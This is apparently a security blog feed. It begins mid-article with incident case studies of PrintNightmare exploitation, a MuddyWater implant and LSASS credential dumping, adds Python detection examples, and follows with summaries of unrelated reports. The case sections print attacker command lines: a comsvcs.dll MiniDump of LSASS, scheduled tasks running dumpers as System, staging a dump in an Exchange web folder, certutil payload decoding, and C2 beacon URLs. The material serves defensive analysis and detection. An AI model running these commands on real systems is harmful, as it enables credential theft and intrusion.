In addition, the attacker ran some of the created libraries using the rundll32 component.
Several hours later, a new wave of activity began. The Kaspersky MDR team detected a modification under the following registry key that forces NTLMv1 authentication, which potentially allows NTLM hashes to be intercepted and then cracked or relayed:
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\MSV1_0
Then the attacker re-created the scheduled task that starts the spooler. After that, execution of various commands on the host with System privileges was observed; the source of this activity was the c:\windows\system32\spoolsv.exe process:
C:\Windows\System32\cmd.exe /c net start spooler
C:\Windows\System32\cmd.exe /c timeout 600 > NUL && net start spooler

The table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK technique: T1570 Lateral Tool Transfer
  MDR telemetry event type: Web AV exact detect in OnDownload mode
  Detection details:
    AV verdict: HEUR:Trojan.Win32.Shelma.gen
  Description: Attacker downloads suspicious DLL (that is, Meterpreter payload) via HTTP

MITRE ATT&CK technique: T1140 Deobfuscate/Decode Files or Information
  MDR telemetry event type: Local File Modification
  Detection details:
    Process command line: certutil  -decode 1.txt C:\Share\hello4.dll
  Description: Attacker used certutil to decode a text file into a PE binary

MITRE ATT&CK technique: T1003.001 OS Credential Dumping: LSASS Memory
  MDR telemetry event type: AV exact detect in OnAccess mode
  Detection details:
    AV verdicts: VHO:Trojan-PSW.Win64.Mimikatz.gen; Trojan-PSW.Win32.Mimikatz.gen
  Description: Attacker tried to use Mimikatz

MITRE ATT&CK technique: T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild
  MDR telemetry event type: Outbound network connection
  Detection details:
    Process command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  C:\Share\1.xml
  Description: MSBuild network activity

MITRE ATT&CK technique: T1210 Exploitation of Remote Services
  MDR telemetry event type: Local File Modification
  Detection details:
    Modified file path: C:\Windows\System32\spool\drivers\x64\3\old\1\hello5.dll
    File modifier: C:\Windows\System32\spoolsv.exe
    Parent of the modifier: C:\Windows\System32\services.exe
  Description: Legitimate spoolsv.exe locally modified c:\windows\system32\spool\drivers\x64\3\old\1\hello5.dll

MITRE ATT&CK techniques: T1547.012 Boot or Logon Autostart Execution: Print Processors; T1033 System Owner/User Discovery
  MDR telemetry event type: Process start
  Detection details:
    Command line: whoami
    Process integrity level: System
    Parent process: C:\WINDOWS\System32\spoolsv.exe
    Grandparent process: C:\Windows\System32\services.exe
  Description: Legitimate spoolsv.exe started whoami with System integrity level

MITRE ATT&CK technique: T1547.012 Boot or Logon Autostart Execution: Print Processors
  MDR telemetry event type: Outbound network connection
  Detection details:
    Process command line: C:\Windows\System32\spoolsv.exe
    Remote TCP port: 4444/TCP
  Description: Legitimate spoolsv.exe made a connection to the default Meterpreter port (4444/TCP)

MITRE ATT&CK techniques: T1547.012 Boot or Logon Autostart Execution: Print Processors; T1059.003 Command and Scripting Interpreter: Windows Command Shell; T1033 System Owner/User Discovery
  MDR telemetry event type: Process start
  Detection details:
    Command line: whoami
    Process integrity level: System
    Parent process: C:\Windows\System32\cmd.exe
    Grandparent process: C:\Windows\System32\spoolsv.exe
  Description: Legitimate spoolsv.exe started cmd.exe, which started whoami with System integrity level
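The detections in both PrintNightmare cases rest on a handful of telemetry relationships rather than on signatures: spoolsv.exe writing a DLL into the spool driver directory, spoolsv.exe appearing in the ancestry of cmd.exe, whoami or rundll32, spoolsv.exe opening an outbound TCP connection, and certutil -decode materialising the payload. The Python below is an added example and not Kaspersky MDR code: the event schema (type, pid, ppid, image, cmdline), the sample events and the 10.0.0.5 peer are constructed for illustration, and the ATT&CK labels follow the tables above.

```python
"""Correlating endpoint telemetry for Print Spooler exploitation.

Added example, not Kaspersky MDR code. Event schema and sample events are
constructed; the spool driver path, the spoolsv -> cmd -> whoami chain and
the 4444/TCP connection mirror the cases described in the text.
"""
import re
from typing import Dict, List, Tuple

# Printer drivers live under ...\spool\drivers\<arch>\3\. A DLL appearing there,
# written by spoolsv.exe itself, is how the exploit stages its payload.
DRIVER_DIR = re.compile(r"\\spool\\drivers\\(x64|w32x86)\\3\\.*\.dll$", re.IGNORECASE)
SPOOLER_CHILDREN = {"cmd.exe", "powershell.exe", "whoami.exe", "rundll32.exe"}

EVENTS = [  # constructed telemetry
    {"type": "process", "pid": 700, "ppid": 1, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"type": "process", "pid": 1520, "ppid": 700, "image": r"C:\Windows\System32\spoolsv.exe", "cmdline": "spoolsv.exe"},
    {"type": "file", "pid": 1520, "path": r"C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll"},
    {"type": "file", "pid": 1520, "path": r"C:\Windows\System32\spool\PRINTERS\00012.SHD"},  # normal print job, must not alert
    {"type": "process", "pid": 2210, "ppid": 1520, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "pid": 2215, "ppid": 2210, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"type": "network", "pid": 1520, "dst_ip": "10.0.0.5", "dst_port": 4444, "proto": "tcp"},
    {"type": "process", "pid": 3000, "ppid": 2500, "image": r"C:\Windows\System32\certutil.exe", "cmdline": r"certutil  -decode 1.txt C:\Share\hello4.dll"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_index(events) -> Dict[int, dict]:
    return {e["pid"]: e for e in events if e["type"] == "process"}


def ancestry(pid: int, procs: Dict[int, dict]) -> List[str]:
    """Image basenames of pid and its ancestors, nearest first; stops at unknown pids."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def image_of(pid: int, procs: Dict[int, dict]) -> str:
    return basename(procs[pid]["image"]) if pid in procs else ""


def detect(events) -> List[Tuple[str, str, str]]:
    """Return (technique, rule, evidence) triples for events that match a rule."""
    procs = process_index(events)
    alerts = []
    for e in events:
        if e["type"] == "file":
            if image_of(e["pid"], procs) == "spoolsv.exe" and DRIVER_DIR.search(e["path"]):
                alerts.append(("T1210", "spoolsv.exe wrote a DLL into the driver directory", e["path"]))
        elif e["type"] == "process":
            name = basename(e["image"])
            # Walk the whole parent chain, so cmd -> whoami under spoolsv is caught too.
            if name in SPOOLER_CHILDREN and "spoolsv.exe" in ancestry(e["ppid"], procs):
                alerts.append(("T1547.012", f"{name} descends from spoolsv.exe", e["cmdline"]))
            if name == "certutil.exe" and re.search(r"\s-decode\s", e["cmdline"], re.IGNORECASE):
                alerts.append(("T1140", "certutil used to decode a file", e["cmdline"]))
        elif e["type"] == "network":
            if image_of(e["pid"], procs) == "spoolsv.exe":
                alerts.append(("T1547.012", "spoolsv.exe made an outbound connection",
                               f"{e['dst_ip']}:{e['dst_port']}/{e['proto']}"))
    return alerts


if __name__ == "__main__":
    for technique, rule, evidence in detect(EVENTS):
        print(f"{technique:10} {rule}: {evidence}")
```

Two design points matter in practice: the file rule keys on the writer being spoolsv.exe and the destination being the driver store, so ordinary spool files under \spool\PRINTERS do not fire; and the process rule walks the full ancestry instead of checking only the direct parent, because the second case in the text shows whoami one hop removed from spoolsv.exe via cmd.exe.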

MuddyWater attack

In this case, the Kaspersky MDR team detected a request from the customer’s infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the MuddyWater group. MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky’s report on this group’s activity is available here.

Among other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below.

First of all, MDR analysts found a VBS implant, presumably related to the MuddyWater group, running from the Startup folder on the monitored host:
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs
After the script executed, several malicious resources were accessed. The structure of these URLs follows the pattern used by the MuddyWater group, and the IP address had been observed in other attacks by this group:
hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1
hxxp://185[.]117[.]73[.]52:443/getCommand?guid=xxx-yyy-zzz*
Next, commands collecting information about the compromised host were executed, with their output appended to a file in ProgramData:
"C:\Windows\System32\cmd.exe" /c explorer.exe >> c:\ProgramData\app_setting_readme.txt
"C:\Windows\System32\cmd.exe" /c whoami >> c:\ProgramData\app_setting_readme.txt

* xxx is company short name (identifier), yyy is the victim hostname and zzz is username

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK technique: T1071 Application Layer Protocol
  MDR telemetry event type: Access to malicious hosts from non-browsers
  Detection details:
    Target URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1
    CMD line: "C:\Windows\System32\WScript.exe" C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs
    Process: C:\Windows\system32\wscript.exe
  Description: VBS script accessed malicious URL during execution

MITRE ATT&CK technique: T1071 Application Layer Protocol
  MDR telemetry event type: URL exact detect
  Detection details:
    Malicious URL: hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1
    AV verdict: Malware
  Description: Malicious URL was successfully detected by AV
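Because the implant encodes the company identifier, hostname and username in the guid parameter, the beacon URL itself tells an analyst which host and account are compromised. The Python below is an added example, not part of the original post: it refangs the hxxp / [.] notation used in the write-up, parses the /getTargetInfo and /getCommand requests into their xxx-yyy-zzz fields, and scores a telemetry record on the two signals the table above uses (non-browser process, script launched from the Startup folder). The sample records and the ACME/WS01/jdoe identifiers are constructed.

```python
"""Pulling victim identifiers out of MuddyWater-style beacon URLs.

Added example, not part of the original post. The defanging, the two C2
endpoints and the guid layout (company-hostname-username) follow the text;
the sample telemetry records (process image, command line, URL) are constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

KNOWN_C2 = {"185.117.73.52"}                      # from the case above
BEACON_PATHS = {"/getTargetInfo", "/getCommand"}
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
BROWSERS = ("chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe")

SAMPLE_LOG = [  # constructed: (process image, command line, URL accessed)
    (r"C:\Windows\system32\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs',
     "hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=ACME-WS01-jdoe&status=1"),
    (r"C:\Windows\system32\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs',
     "hxxp://185[.]117[.]73[.]52:443/getCommand?guid=ACME-WS01-jdoe"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "https://www.example.com/getCommand?guid=1"),   # same path name, not the beacon format
]


def refang(url: str) -> str:
    """Undo the defanging used in the write-up so the URL can be parsed."""
    return url.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def parse_beacon(url: str) -> Optional[Dict[str, object]]:
    """Return C2 host/port/endpoint and the xxx-yyy-zzz guid fields, or None."""
    parts = urlsplit(refang(url))
    if parts.path not in BEACON_PATHS:
        return None
    guid = parse_qs(parts.query).get("guid", [""])[0]
    # Company id, hostname, username. A hostname containing "-" makes the split
    # ambiguous, which is why classification keys on path and host, not guid alone.
    fields = guid.split("-", 2)
    if len(fields) != 3:
        return None
    return {"host": parts.hostname, "port": parts.port, "endpoint": parts.path,
            "company": fields[0], "victim_host": fields[1], "victim_user": fields[2]}


def classify(image: str, cmdline: str, url: str) -> List[str]:
    """Reasons a telemetry record looks like the implant beaconing; empty list if none."""
    beacon = parse_beacon(url)
    if beacon is None:
        return []
    reasons = [f"beacon-shaped request to {beacon['endpoint']}"]
    if beacon["host"] in KNOWN_C2:
        reasons.append("destination is a known MuddyWater C2 address")
    if image.lower().endswith("wscript.exe") and STARTUP_DIR.search(cmdline):
        reasons.append("wscript.exe running a script from the Startup folder")
    if not image.lower().endswith(BROWSERS):
        reasons.append("URL accessed from a non-browser process")
    return reasons


if __name__ == "__main__":
    for image, cmdline, url in SAMPLE_LOG:
        print(url, "->", classify(image, cmdline, url) or "clean")
```

The URL shape alone is a weak signal (any web app may expose a /getCommand path), so the classifier only reports it together with the request coming from a script host or other non-browser process, which is exactly the "access to malicious hosts from non-browsers" telemetry type in the table above.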

Credential Dumping from LSASS Memory

In the last case, we would like to talk about an attack involving the collection of credentials from a memory dump of the LSASS process (MITRE technique T1003.001). The Local Security Authority Subsystem Service (LSASS) keeps a variety of credentials in its process memory. These can be harvested by a process running as System or by an administrative user (reading LSASS memory requires SeDebugPrivilege) and then used to develop the attack or move laterally.

MDR analysts detected an attempt to dump the LSASS process memory on the monitored host, even though most of the attacker's actions did not differ from the usual actions of an administrator. The attackers used two public tools (the first was detected and blocked by the endpoint protection) to dump the LSASS process memory and then staged the dump on the organization's Exchange server. The first dump command ran under wsmprovhost.exe with a network logon, i.e. it was executed remotely via WinRM. In particular, the MDR team observed lsass.exe loading and executing a suspicious DLL categorized as a Security Support Provider (SSP).

The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID:
C:\Windows\System32\tasklist.exe
C:\Windows\System32\findstr.exe /i sass
After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by the endpoint protection solution:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 c:\programdata\cdera.bin full

## 616 is LSASS process id

Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the files resource.exe and twindump.dll:
C:\Windows\System32\cmd.exe /C c:\"program files"\7-zip\7z.exe x -pKJERKL6j4dk&@1 c:\programdata\m.zip -o c:\windows\cluster

## resource.exe and twindump.dll files were created

Subsequently, resource.exe was registered as a scheduled task and executed. However, this attempt to obtain an LSASS dump was unsuccessful:
C:\Windows\System32\cmd.exe /C C:\Windows\System32\staskes.exe /create /tn Ecoh /tr "cmd /c C:\Windows\cluster\resource.exe ase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru system /F

## staskes.exe is a renamed schtasks.exe file

Later, one more attempt at this technique was made. The attacker unpacked an archive containing another malicious utility and ran it the same way as before. The created files are presumably related to the MirrorDump tool. This time the attacker successfully obtained an LSASS dump:
C:\Windows\System32\cmd.exe /C c:\"program files"\7-zip\7z.exe x -p"KJERfK#L6j4dk321" c:\programdata\E.zip -o c:\programdata\
C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /create /tn Ecoh /tr "c:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp" /sc onstart /ru system /F
C:\Windows\System32\cmd.exe /C c:\windows\system32\staskes.exe /run /tn Ecoh
The archived dump was then copied into the OWA authentication directory of the Exchange server under a .png name, a location served by the web server, from which it could be downloaded. Afterwards, the attacker deleted all the created files:
C:\Windows\System32\cmd.exe /C copy c:\programdata\Es.zip c:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\owa\auth\Es.png

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK technique: T1003.001 OS Credential Dumping: LSASS Memory
  MDR telemetry event type: AV exact detect
  Detection details:
    AV verdict: PDM:Exploit.Win32.Generic
    Process command line: "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 C:\programdata\cdera.bin full
    Parent process command line: C:\Windows\System32\wsmprovhost.exe -Embedding
    Grandparent process command line: C:\Windows\System32\svchost.exe -k DcomLaunch
    Process logon type: 3 (Network logon)
  Description: Remotely executed process memory dump was detected by the AM engine; 616 is the LSASS process PID

MITRE ATT&CK technique: T1003.001 OS Credential Dumping: LSASS Memory
  MDR telemetry event types: Create section (load DLL); Execute section (run DLL)
  Detection details:
    DLL name: C:\programdata\english1.dll
    Process: C:\Windows\System32\lsass.exe
    Process PID: 616
    Parent process command line: C:\Windows\System32\wininit.exe
    Process integrity level: System
  Description: Unknown DLL was loaded and executed within lsass.exe

MITRE ATT&CK technique: T1003.001 OS Credential Dumping: LSASS Memory
  MDR telemetry event type: Inexact AV detect
  Detection details:
    Internal AV verdict: The file is a Security Support Provider (SSP)
    File path: C:\programdata\english1.dll
    Process: C:\Windows\System32\lsass.exe
  Description: Unknown DLL loaded into lsass.exe is an SSP

MITRE ATT&CK technique: T1053.005 Scheduled Task/Job: Scheduled Task
  MDR telemetry event type: Create process
  Detection details:
    Process command line: C:\programdata\InEnglish.exe g2@j5js1 0sdfs,48 C:\programdata\EnglishEDouble C:\programdata\EnglishDDouble C:\programdata\English1.dll C:\programdata\English.dmp
    Parent process command line: taskeng.exe {7725474B-D9EA-473D-B10D-AC0572A0AA70} S-1-5-18:NT AUTHORITY\System:Service:
    Grandparent process command line: C:\Windows\System32\svchost.exe -k netsvcs
    Process integrity level: System
    Process user SID: S-1-5-18
  Description: Suspicious executable from C:\programdata run as a scheduled task under System privileges

Observed malicious files (MD5):

c:\programdata\e.zip             37630451944A1DD027F5A9B643790B10
c:\programdata\es.zip            3319BD8B628F8051506EE8FD4999C4C3
c:\programdata\m.zip             C15D90F8374393DA2533BAF7359E31F9
c:\programdata\inenglish.exe     CB15B1F707315FB61E667E0218F7784D
c:\programdata\english1.dll      358C5061B8DF0E0699E936A0F48EAFE1
c:\windows\cluster\resource.exe  872A776C523FC33888C410081A650070
c:\windows\cluster\twindump.dll  F980FD026610E4D0B31BAA5902785EDE
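Three of the signals in this case translate directly into detection logic: rundll32 invoking comsvcs.dll MiniDump against the LSASS PID, a system utility running under a name that does not match the original file name embedded in its PE version information (staskes.exe for schtasks.exe), and a DLL loaded into lsass.exe from outside System32. The Python below is an added example, not Kaspersky MDR code; the event schema and sample records are constructed, and the orig_name field stands in for the OriginalFilename that EDR process telemetry normally carries. The ordinal form of the MiniDump export (#24) is included because it is a common variant of the same command.

```python
"""Three checks for the LSASS-dump tradecraft described above.

Added example, not Kaspersky MDR code. Event schema and sample records are
constructed; "orig_name" stands in for the PE version-info OriginalFilename
that EDR telemetry normally supplies, which is what exposes a renamed binary.
"""
import re

# comsvcs.dll exports MiniDump by name and at ordinal #24; match either form.
# Groups: 3 = target PID, 4 = dump file path.
MINIDUMP_RE = re.compile(
    r"comsvcs(\.dll)?[\s,]+(#24|MiniDump)\s+(\d+)\s+(\S+)", re.IGNORECASE)

SYSTEM32 = "c:\\windows\\system32\\"
LSASS_PID = 616  # constructed; in practice taken from the lsass.exe process-start event

PROCESS_EVENTS = [  # constructed, mirroring the case above
    {"pid": 4100, "image": r"C:\Windows\System32\rundll32.exe", "orig_name": "RUNDLL32.EXE",
     "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump 616 c:\programdata\cdera.bin full'},
    {"pid": 4200, "image": r"C:\Windows\System32\staskes.exe", "orig_name": "schtasks.exe",
     "cmdline": r'C:\Windows\System32\staskes.exe /create /tn Ecoh /tr "cmd /c C:\Windows\cluster\resource.exe a b" /sc onstart /ru system /F'},
    {"pid": 4300, "image": r"C:\Windows\System32\schtasks.exe", "orig_name": "schtasks.exe",
     "cmdline": "schtasks /query /tn Ecoh"},  # benign: name matches, read-only query
]

IMAGE_LOAD_EVENTS = [  # constructed DLL loads into lsass.exe
    {"pid": 616, "process": r"C:\Windows\System32\lsass.exe", "dll": r"C:\programdata\english1.dll"},
    {"pid": 616, "process": r"C:\Windows\System32\lsass.exe", "dll": r"C:\Windows\System32\msv1_0.dll"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_minidump(event, lsass_pid):
    """rundll32 invoking comsvcs MiniDump; records whether the target PID is lsass."""
    m = MINIDUMP_RE.search(event["cmdline"])
    if m and basename(event["image"]) == "rundll32.exe":
        target = int(m.group(3))
        return {"rule": "T1003.001 comsvcs.dll MiniDump", "target_pid": target,
                "is_lsass": target == lsass_pid, "dump_path": m.group(4)}
    return None


def check_renamed_binary(event):
    """Image name differs from the PE's OriginalFilename (e.g. staskes.exe vs schtasks.exe)."""
    image = basename(event["image"])
    orig = event.get("orig_name", "").lower()
    if orig and image != orig:
        return {"rule": "renamed system utility", "image": image, "original": orig}
    return None


def check_lsass_module(event):
    """A DLL loaded into lsass.exe from outside System32 is a likely rogue SSP or dumper."""
    if basename(event["process"]) != "lsass.exe":
        return None
    if not event["dll"].lower().startswith(SYSTEM32):
        return {"rule": "T1003.001 unknown DLL in lsass.exe (possible SSP)", "dll": event["dll"]}
    return None


def run(process_events, image_load_events, lsass_pid=LSASS_PID):
    """Apply all three checks and return the findings with the offending PID attached."""
    findings = []
    for e in process_events:
        for finding in (check_minidump(e, lsass_pid), check_renamed_binary(e)):
            if finding:
                findings.append(dict(finding, pid=e["pid"]))
    for e in image_load_events:
        finding = check_lsass_module(e)
        if finding:
            findings.append(dict(finding, pid=e["pid"]))
    return findings


if __name__ == "__main__":
    for f in run(PROCESS_EVENTS, IMAGE_LOAD_EVENTS):
        print(f)
```

The MiniDump check deliberately reports the target PID even when it is not lsass: a dump of any process via rundll32/comsvcs is unusual enough to be worth an analyst's attention, and the is_lsass flag lets severity be raised only when the PID matches the one seen in the lsass.exe process-start event.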

Conclusion

Attackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.

Countering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.

Incident response analyst report 2020 https://securelist.com/incident-response-analyst-report-2020/104080/ Mon, 13 Sep 2021 11:00:04 +0000

 Download full report (PDF)

The Incident response analyst report provides insights into incident investigation services conducted by Kaspersky in 2020. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complementary expert activities for their internal incident response teams.

In 2020, the pandemic forced companies to restructure their information security practices, accommodating a work-from-home (WFH) approach. Although key trends in terms of threats have stayed the same, our service approach moved to a near-complete – 97% of all cases – remote delivery.

Geography of incident responses by region, 2020


Most of the incident handling requests were received from the CIS (27.8%), European Union (24.7%) and the Middle East (22.7%) regions. In 2020, organizations seeking our assistance represented a wide spectrum of business sectors, industry, finance, government, telecoms, transportation and healthcare.

Share of incident responses by verticals and industries, 2020


Industrial businesses were the most affected by cyberattacks (22%), followed by government institutions (19%). Most of our responses were ransomware-related: in 32.7% of true positive cases, the incidents were caused by encrypted files.

Overall, the Incident response analyst report 2020 contains four chapters:

  • Reasons to go for incident response
    Most incidents for which the cause could be established before the impact materialized can be confidently classified as ransomware. This threat is overtaking money theft and other impacts as a more convenient monetization scheme with much broader industry coverage (not just finance).
  • Initial vectors, or how attackers got in
    Security issues with passwords, software vulnerabilities and social engineering combined into an overwhelming majority of initial access vectors during attacks.
  • Tools and exploits
    Almost half of all incident cases included the use of existing OS tools (like LOLbins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, Masscan) and specialized commercial frameworks (Cobalt Strike).
  • Attack duration
    We grouped all incident cases into three categories with different attacker dwell times, incident response duration, initial access, and impact from the attack.

To learn more on these topics, please read the full report (English, PDF).

Managed Detection and Response in Q4 2020 https://securelist.com/managed-detection-and-response-in-q4-2020/103387/ Wed, 21 Jul 2021 10:00:04 +0000

 Download full report (PDF)

As cyberattacks become more sophisticated, and security solutions require more resources to analyze the huge amount of data gathered every day, many organizations feel the need for advanced security services that can deal with this growing complexity in real time, 24/7.

This article contains some analytical findings from Managed Detection and Response (MDR) operations during Q4 2020.

What is Kaspersky MDR

Kaspersky MDR uses Kaspersky Endpoint Security and Kaspersky Anti Targeted Attack Platform as low-level telemetry suppliers after MDR license activation. Raw telemetry is initially enriched and correlated in the cloud, then two levels of SOC analysis process the resulting alerts. The first level of SOC analysis is a neural network-based supervised ML model that is trained on alerts investigated by human analysts. The second level consists of on-duty SOC analysts, who triage alerts and provide recommendations on response to customers.

The MDR team also has a dedicated group for threat-hunting activities — proactive searching for threats through raw telemetry to find attacks that were not detected by automated logic, including ML/AI in the MDR cloud infrastructure. The threat-hunting team is responsible for detection engineering, so all threats found manually are then covered with automatic detection and prevention logic to speed up customer protection.
During the reporting period, Kaspersky MDR was used across all industry verticals as shown below along with the share of detected incidents for each.

Data processing pipeline and security operations

In Q4 2020, the average number of collected raw events from one host was around 15 000. This comparatively low amount is explained by comprehensive analysis performed by Kaspersky Endpoint Security right at the endpoint, such as objects reputation checks, and the fact that only a required minimum of telemetry is sent to the cloud for further analysis.

During the reported period, MDR processed approximately 65 000 alerts, followed by an investigation that resulted in 1 506 incidents reported to customers, approximately 93% of which were mapped to the MITRE ATT&CK framework.

From a security operations standpoint, incident processing depends on alert severity. High severity typically requires more time to investigate and provide recommendations on remediation steps.

Incident remediation efficiency

Most of the incidents (80.1%) were detected based on the first analyzed alert. This means that after the first true positive alert, remediation activities stopped the attack from happening and no new alerts were linked to the incident. This demonstrates that remediation is fairly efficient.

Incidents linked to 2-4 alerts account for 15.3%; they represent the main directions for detection engineering, both in new alert development and improvements to existing alerts.

Incidents linked with larger numbers of alerts are related to cases where fast remediation is not efficient or not allowed. Examples of these incidents include a new targeted attack that requires thorough investigation before active response, or security assessment engagements, where active counteraction to attacker is not allowed.

Incident severity

According to the MDR incident severity classification, High-severity incidents are related to human-driven attacks or malware outbreaks with a high impact. Medium severity is related to incidents that significantly affect the efficiency or performance of assets covered by MDR. Finally, Low severity is related to incidents without a significant impact, which still ought to be fixed, for example, infection with grayware, such as adware, riskware, etc.

High-severity incidents can be caused by a number of factors:

  • APT, targeted attack
  • Offensive exercise
  • Artefacts of APT, targeted attack
  • Malware with critical impact
  • Likely-to-be-exploited vulnerability
  • DDOS/DOS with impact
  • Insider threat with impact (subversion, fraud)
  • Social engineering

In the analyzed period, the incident severity statistics and distribution of High-severity incidents were as follows.

Distribution of incidents by criticality Types of High-severity incidents

Almost all of the verticals in the analyzed period were victims of targeted attacks. IT, Government and Industrial are the TOP 3. Companies that suffered from targeted attacks typically engaged in offensive exercises, a sign of adequate risk assessment.

Adversary tactics, techniques and procedures

As for the attack kill-chain stage, we do not see any correlation between incident severity and tactics at the moment of detection, although it might be expected that more complex attacks would be detected at a later stage.

Analysis of the detection technology has confirmed the need for a combination of different detection systems: endpoint tactics are efficiently detected by the EPP, the sandbox (SB) gives better results at analyzing content before it reaches the endpoint, and all network communications are subject to IDS.

Next, there are the top performing (by the number of reported incidents) MITRE ATT&CK techniques, detected by telemetry from each sensor.

Analysis of tools that attackers use in the incidents shows that PowerShell is still number one and especially popular in High-severity incidents.

Recommendations

Analysis of incident statistics suggests the following recommendations on improving the security controls in place.

  • One third of all high-severity incidents were human-driven targeted attacks. Automated tools are not enough for fully detecting these, so manual threat hunting in combination with classical alert-driven monitoring should be implemented.
  • Professional red team exercises are very similar to advanced attacks and are thus a good approach to assessing the organization’s operational efficiency.
  • Nine percent of reported High-severity incidents were successful social engineering attacks, which demonstrates the need for raising employee security awareness.
  • Be ready to detect threats that use every tactic (attack kill chain phase).
  • Even a complex attack consists of simple steps and techniques; the detection of a particular technique can expose the whole attack.
  • Different detection technologies have different levels of efficiency with different attacker techniques. Maintain a variety of security technologies to increase the chances of successful detection.
  • Monitor PowerShell with built-in Windows events or comprehensive EDRs.
Adaptive protection against invisible threats https://securelist.com/adaptive-protection-against-invisible-threats/99772/ Mon, 14 Dec 2020 12:00:59 +0000

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is used on a large number of devices, so simply banning it is not feasible. Antivirus solutions also treat these files as “trusted”, so they may not quickly recognize that a piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity is sometimes started by administrators themselves as part of system maintenance: for example, the “trusted” Windows Management Instrumentation (WMI) on a remote machine can be used for software deployment. This further complicates threat detection.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware, fileless malware, that is often used as a downloader. It does not store itself on the hard disk, so tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as those of the Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation (WMI) processes, two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannaMine cryptominer. WMI on remote machines is also often used by malware for lateral movement.

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

